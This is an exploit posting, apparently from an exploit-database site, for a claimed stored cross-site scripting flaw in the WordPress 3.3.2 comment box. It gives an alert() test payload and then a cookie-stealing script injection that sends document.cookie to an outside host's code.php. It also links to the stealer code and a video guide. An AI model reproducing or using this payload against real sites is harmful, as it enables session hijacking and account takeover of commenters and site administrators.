######################
# Author : L3b-r1'z
# Tilte : Wordpress 0day Cross Site Scripting (STORED) Version 3.3.2
# Date : 2012-May-04
# Email : L3br1z@gmail.com
######################

Desc :

This Exploit In Comment b0x , if you put <script>alert(1337)</script> You
will See The Alert :) .

Note :

If Admin Active When You Make Comment Not Published ( Not Work Exploit :D ).

How We Steal Coockie :D :

By b0x {

The Code Is Here :
http://www.poletti.info//public/sito/img/db/girocollo/code.txt

The Inject : <script>window.open("
http://www.poletti.info//public/sito/img/db/girocollo/code.php?c=
"+document.cookie)</script>

See The Video For More Information :
http://www.4shared.com/rar/f7z84vvj/xsswp.html

Thx To : The Injector , b0x , Mr.Thmoory , Damane2011 , Sec4ever , N4SS1m ,
B07 M4S73r , Hacker-1420 , The Viper , Exp-Bl00d And All My Friends.

And : PacketstormSecurity.com , 1337day.com , exploit4arab.com ,
exploit-db.com .

NO MORE 0DAY :)

-- 
L3b-r1'z .
proud to be lebanese :)
Sec4Ever.Com